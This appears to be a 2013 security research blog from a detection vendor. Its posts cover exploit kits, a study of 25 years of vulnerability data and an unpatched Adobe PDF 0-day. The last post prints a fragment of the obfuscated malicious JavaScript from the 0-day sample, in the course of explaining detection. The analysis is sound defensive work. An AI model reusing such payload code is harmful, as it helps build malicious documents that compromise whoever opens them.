Monday, February 25, 2013

Life Cycle and Detection of an Exploit Kit

Exploit kits may not be as hot a topic as the recently released Mandiant Report, but they're still an important part of today's threat landscape. As the success of the Cool Exploit Kit lets its author buy vulnerabilities, for example, these kits are not only one of the more prevalent ways of dropping malware on end-users, they're actually pushing defenders towards a time with more and more 0-days to worry about.

Those of you who would like to understand more about how these kits work, check out my recent presentation on the subject. The presentation assumes no prior knowledge, so it's a perfect starting point even for management types who might not quite understand the threat landscape.

For those of you running Sourcefire/Snort boxes who are looking for exploit kit coverage, be sure to review how many rules from our new Exploit-Kit category you have enabled - while 200 of the 222 in that category are in the balanced policy by default, if you're not running a current SEU, you're missing a lot of powerful detection.

Wednesday, February 20, 2013

25 years of vulnerabilities: 1988-2012

We at the VRT are always interested in vulnerabilities and information about vulnerabilities. To this end we recently dug into the NVD database and examined data for the last 25 years and used it to map out trends and general information on vulnerabilities in software.

Some of the questions we asked ourselves were:
  • What are the most popular vulnerabilities?
  • Which had the most impact?
  • Which vendors and products suffered from the most issues?
  • Which browser is the best in terms of vulnerabilities found?
  • How many 0-days are found in products?
While the answers to some of these questions are predictable, others are surprising.

We will be presenting the answers to these questions in a talk at RSA Conference San Francisco 2013. If you're attending RSA and are interested in the answers to these questions, please join us on March 1st at 9.00 AM. A report delving into the details will be released after the conference, you can pre-register here and you will receive a link to the report once it's been published.

UPDATE: the full report has now been released, download it here

Thursday, February 14, 2013

More Targeted PDF 0-Day

Much like other vendors in the security space, the VRT spent yesterday scrambling to address the latest Adobe/PDF vulnerability. The attack - which works across multiple operating systems, bypasses Adobe's sandbox, and which has been used in recent targeted campaigns - is still without a patch, as Adobe mobilizes their response organization to address the matter.

Upon first opening the sample, it was blatantly obvious that something fishy was going on, as the first content in the file was a ~400K+ block of highly obfuscated JavaScript:

/JS (\n0 >> 0 >> 0 >> 0 >> 0 >> 0;\nfunction sHOGG\(c,d,e\){\n    var idx = d % c.length;\n    var s = "";\n    while \(s.length < c.length\){\n        s += c[idx];\n        idx = \(idx + e\) % c.length;\n    }\n    return s;\n}\n0 >> 0 >> 0 >> 0 >> 0 >> 0;\nfunction oTHERWISE\(pRENDENDO,t\){\n if\(pRENDENDO == sHOGG\('014.031.4.',3571,9173\)\){\n var r="";\nr+=ue\(t+2*2*2*3+11*3\);\nr+=ue\(t+11*5+2\);r+=ue\(t+19*3\);r+=ue\(t+3*19\);r+=ue\(t+19*3\);r+=ue\(t+43+7*2\);r+=ue\(t+11*2+5*7\);r+=ue\(t+19*3\);r+=ue\(t+3*3*2*2+7*3\);r+=ue\(t+11*3+2*2*3*2\);r+=ue\(t+2*7+43\);r+=ue\(t+19*3\);r+=ue\(t+3*19\);r+=ue\(t+19*3\);\nr+=ue\(t+19*3\);r+=ue\(t+3*19\);r+=ue\(t+31+13*2\);\nr+=ue\(t+19*3\);r+=ue\(t+5+2*2*13\);

We're currently testing signatures that would detect files like these on a generic level - while JavaScript in PDFs is nothing new, typically that script is small, well-defined, and represents a much smaller portion of the overall file size. In the meantime, we are releasing today SIDs 25818 and 25819 to counter this particular threat, and 25817 to detect command and control traffic associated with this campaign.